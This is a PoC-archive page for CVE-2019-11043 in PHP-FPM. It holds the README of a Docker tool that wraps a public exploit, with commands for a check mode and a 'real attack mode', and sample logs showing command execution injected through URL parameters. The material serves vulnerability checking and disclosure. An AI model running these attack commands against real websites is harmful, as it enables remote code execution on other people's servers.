Related vulnerability
Title:
PHP buffer error vulnerability
(CVE-2019-11043)
Description: PHP (PHP: Hypertext Preprocessor) is an open-source, general-purpose scripting language maintained jointly by the PHP Group and the open-source community. It is used mainly for web development and supports many databases and operating systems. PHP contains a buffer error vulnerability. The flaw arises when the network system or product performs memory operations without correctly validating data boundaries, causing incorrect reads or writes to adjacent memory locations. An attacker can exploit it to cause a buffer overflow or heap overflow. The following products and versions are affected: PHP 7.1.x versions before 7.1.33, 7.2.x versions before 7.2.24, 7
Description
Docker image and commands to check CVE-2019-11043 vulnerability on nginx/php-fpm applications.
Introduction
# Docker image and commands to check CVE-2019-11043
[Travis CI](https://travis-ci.org/ypereirareis/docker-CVE-2019-11043)
* **CVE:** CVE-2019-11043
* **Description:** In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11, in certain configurations of the FPM setup it is possible to cause the FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.
* **Details:** https://nvd.nist.gov/vuln/detail/CVE-2019-11043
* **Github exploit:** https://github.com/neex/phuip-fpizdam
## Help
```bash
docker run --rm ypereirareis/cve-2019-11043
docker run --rm ypereirareis/cve-2019-11043 -h
```
## Check a website or URL
```bash
docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/index.php
```
### Vulnerability result example:
https://github.com/neex/phuip-fpizdam#playground-environment
**Check mode only**
```bash
$ docker run --rm --net=host ypereirareis/cve-2019-11043 --only-qsl http://127.0.0.1:8080/script.php
2019/10/30 10:55:35 Base status code is 200
2019/10/30 10:55:35 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 10:55:35 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 10:55:35 Detect() found QSLs and that's it
```
**Real attack mode**
```bash
$ docker run --rm --net=host ypereirareis/cve-2019-11043 http://127.0.0.1:8080/script.php
2019/10/30 11:03:33 Base status code is 200
2019/10/30 11:03:33 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 11:03:33 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 11:03:33 Attack params found: --qsl 1760 --pisos 55 --skip-detect
2019/10/30 11:03:33 Trying to set "session.auto_start=0"...
2019/10/30 11:03:33 Detect() returned attack params: --qsl 1760 --pisos 55 --skip-detect <-- REMEMBER THIS
2019/10/30 11:03:33 Performing attack using php.ini settings...
2019/10/30 11:03:33 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/30 11:03:33 Trying to cleanup /tmp/a...
2019/10/30 11:03:33 Done!
```

### No Vulnerability result example:
```bash
$ docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/wp_admin.php
2019/10/28 09:41:30 Base status code is 200
2019/10/28 09:41:32 Detect() returned error: no qsl candidates found, invulnerable or something wrong
```
## Build the docker image
```bash
docker build -t ypereirareis/cve-2019-11043 .
```
File snapshot
[4.0K] /data/pocs/3955607f4bce4cd9ac17edaa81ddb7f66e3c7875
├── [ 285] Dockerfile
├── [4.0K] img
│ └── [ 74K] exploit.jpg
├── [1.1K] LICENSE
├── [2.6K] README.md
└── [ 150] tests.sh
1 directory, 5 files
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.